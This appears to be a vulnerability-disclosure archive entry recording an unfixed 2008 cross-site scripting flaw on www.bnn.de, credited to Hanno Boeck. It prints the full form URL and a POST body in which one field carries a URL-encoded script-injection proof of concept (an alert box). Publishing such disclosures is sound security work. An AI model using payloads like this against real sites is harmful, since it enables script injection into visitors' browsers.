Security researcher Hanno Boeck, has submitted on 20/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.bnn.de, which at the time of submission ranked 592798 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 20/06/2008 |
Date published: 05/07/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Hanno Boeck |
Domain: www.bnn.de |
Category: XSS |
Pagerank: 592798 |
URL: https://www.bnn.de/vertrieb/aboservice/namenaenderung/script/formresponse.php4 |
POST: Schenker_Kundennr=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Schenker_Anrede=-&Schenker_Titel= -&Schenker_Vorname=&Schenker_Nachname=&Schenker_Strasse=&Schenker_Hausnummer=&Schenker_PLZ=&Schenker _Ort=&Schenker_Telefon=&Schenker_E-Mail=&Beschenkter_Anrede=-&Beschenkter_Titel=-&Beschenkter_Vornam e=&Beschenkter_Nachname=&Beschenkter_Strasse=&Beschenkter_Hausnummer=&Beschenkter_PLZ=&Beschenkter_O rt=&Beschenkter_Telefon=&Lieferbeginn_Tag=17&Lieferbeginn_Monat=November&Lieferbeginn_Jahr=2008&Absc hicken=weiter&email_anbieter=vertrieb%40bnn.de&name_anbieter=BNN-Vertrieb&betreff=Adress-+oder+Namen s%E4nderung |
Click here to view the mirror
|
|
|